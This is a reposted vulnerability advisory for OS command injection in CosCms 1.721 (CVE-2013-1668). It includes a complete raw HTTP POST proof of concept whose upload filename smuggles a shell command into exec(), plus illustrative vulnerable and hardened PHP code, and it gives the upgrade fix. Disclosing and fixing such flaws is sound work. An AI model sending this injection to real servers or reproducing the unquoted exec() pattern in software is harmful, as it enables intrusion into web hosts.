
CosCms 1.721 - OS Command Injection - Website Security - 自学php

Source: 自学PHP网    Date: 2015-04-17 11:59


Affected product: CosCms
Vendor: http://www.coscms.org
Affected versions: 1.721 and probably prior
Tested version: 1.721
 
Analysis:
High-Tech Bridge Security Research Lab discovered a vulnerability in CosCms which can be exploited to execute arbitrary OS commands on the web server where the vulnerable application is hosted.
 
 
1) OS Command Injection in CosCms: CVE-2013-1668
 
The vulnerability exists due to insufficient validation of user-supplied input in the "$_FILES['file']['name']" variable passed to the "/gallery/upload/index" URL before it is used in the PHP "exec()" function. A remote attacker can send a specially crafted HTTP POST request containing a malicious filename and execute arbitrary commands on the target system with the privileges of the web server.
 
The following PoC (Proof of Concept) request writes the output of the "ls -la" command into the "/gallery/upload/file.txt" file. Any tool that sends raw HTTP requests can be used, e.g. telnet:
 
 
 
POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------21456260222104
Content-Length: 970
 
-----------------------------21456260222104
Content-Disposition: form-data; name="title"
 
1
-----------------------------21456260222104
Content-Disposition: form-data; name="image_add"
 
1
-----------------------------21456260222104
Content-Disposition: form-data; name="description"
 
1
-----------------------------21456260222104
Content-Disposition: form-data; name="tags"
 
 
-----------------------------21456260222104
Content-Disposition: form-data; name="MAX_FILE_SIZE"
 
100000000
-----------------------------21456260222104
Content-Disposition: form-data; name="APC_UPLOAD_PROGRESS"
 
511ad0922b50f
-----------------------------21456260222104
Content-Disposition: form-data; name="file"; filename="1 & ls -la > file.txt"
Content-Type: application/octet-stream
 
1
 
-----------------------------21456260222104
Content-Disposition: form-data; name="submit"
 
Update
-----------------------------21456260222104-- 
 
 
 
Successful exploitation of this vulnerability requires the attacker to be logged in and to have privileges to upload files. User registration is disabled by default.
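As an added illustration (not CosCms or the gallery module's own code), the pattern the advisory describes: a hypothetical upload handler that interpolates the client-supplied filename into exec(), beside a hardened version that allow-lists the name and quotes every shell argument with escapeshellarg(). The convert command, the paths and the function names are assumptions.

```php
<?php
// Added illustration, not code from CosCms or the gallery module: a hypothetical
// upload handler showing the vulnerable pattern the advisory describes, next to
// a hardened version. The convert command and the paths are assumptions.

// Vulnerable pattern: the client-controlled filename is interpolated into a
// shell command unquoted, so a name such as "1 & ls -la > file.txt" (the
// advisory's PoC) terminates the intended command and appends its own.
function convert_upload_vulnerable(string $tmp, string $name): void {
    $dest = '/gallery/upload/' . $name;          // hypothetical destination
    exec("convert $tmp -resize 800x600 $dest");   // $name reaches the shell as-is
}

// Hardened version: keep only the base name, validate it against an allow-list
// of characters and extensions, and quote every argument with escapeshellarg().
function safe_upload_name(string $name): string {
    $base = basename($name);                      // drop any directory components
    if (!preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $base) || $base[0] === '.') {
        throw new InvalidArgumentException('rejected upload filename');
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        throw new InvalidArgumentException('rejected upload extension');
    }
    return $base;
}

function convert_upload_hardened(string $tmp, string $name): void {
    $dest = '/gallery/upload/' . safe_upload_name($name);
    $cmd  = 'convert ' . escapeshellarg($tmp)
          . ' -resize 800x600 ' . escapeshellarg($dest);
    exec($cmd, $output, $status);                 // $output and $status are filled by exec()
    if ($status !== 0) {
        throw new RuntimeException('image conversion failed');
    }
}

// Constructed inputs: the advisory's PoC filename never reaches exec() in the
// hardened path, while an ordinary image name passes through unchanged.
try {
    safe_upload_name('1 & ls -la > file.txt');
} catch (InvalidArgumentException $e) {
    echo "blocked: " . $e->getMessage() . "\n";
}
echo safe_upload_name('photo.jpg') . "\n";
```

Validating the name does not replace quoting: escapeshellarg() protects the command even when a later change loosens the allow-list, and moving the image processing to a library call that never spawns a shell removes the injection surface entirely.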
 
Solution:

Upgrade to CosCms 1.822
 
More Information:
http://www.coscms.org/blog/view/4/Version-1.822
https://github.com/diversen/gallery/blob/master/upload/index.php
https://github.com/diversen/gallery/commit/7d58f870e8edc6597485dd1b80ea9fb78580190c
 
